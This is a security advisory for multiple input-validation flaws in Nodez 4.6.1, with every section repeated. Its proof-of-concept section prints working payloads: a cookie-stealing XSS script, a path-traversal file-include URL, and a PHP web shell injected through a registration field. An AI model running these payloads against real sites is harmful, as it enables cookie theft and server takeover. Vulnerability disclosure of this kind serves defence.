Nodez Multiple Input Validation Vulnerabilities
BID:17066
Info
Nodez Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 17066 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 10 2006 12:00AM |
| Updated: | Mar 13 2006 06:45PM |
| Credit: | Hamid Ebadi is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Nodez Nodez 4.6.1 .1 |
| Not Vulnerable: | |
Discussion
Nodez Multiple Input Validation Vulnerabilities
Nodez is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML or script code in the browser of a victim user in the context of the affected website; this may facilitate the theft of cookie-based authentication credentials.
The attacker can also exploit these issues to inject arbitrary PHP code and include arbitrary local files. These two issues combined may facilitate a compromise of the underlying computer. Other attacks are also possible.
Nodez is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML or script code in the browser of a victim user in the context of the affected website; this may facilitate the theft of cookie-based authentication credentials.
The attacker can also exploit these issues to inject arbitrary PHP code and include arbitrary local files. These two issues combined may facilitate a compromise of the underlying computer. Other attacks are also possible.
Exploit / POC
Nodez Multiple Input Validation Vulnerabilities
These issues can be exploited through use of a web client.
The following proof of concepts are available:
Cross-site scripting:
http://www.example.com/nodez/?node=system&op=block<script>alert(document.cookie)</script>&block=3&bop=more
Local file include:
http://www.example.com/nodez/?node=system&op=/../../../[SHELL]%00&cmd=dir
PHP code injection:
register an account
username:hamid
password:hamidnetworksecurityteam
email: PHP code like (PHP Code Injection) :
<?system ($_GET['cmd']);?>
and then use local file inclusion :
http://www.example.com/nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=dir
These issues can be exploited through use of a web client.
The following proof of concepts are available:
Cross-site scripting:
http://www.example.com/nodez/?node=system&op=block<script>alert(document.cookie)</script>&block=3&bop=more
Local file include:
http://www.example.com/nodez/?node=system&op=/../../../[SHELL]%00&cmd=dir
PHP code injection:
register an account
username:hamid
password:hamidnetworksecurityteam
email: PHP code like (PHP Code Injection) :
<?system ($_GET['cmd']);?>
and then use local file inclusion :
http://www.example.com/nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=dir
Solution / Fix
Nodez Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
Nodez Multiple Input Validation Vulnerabilities
References:
References: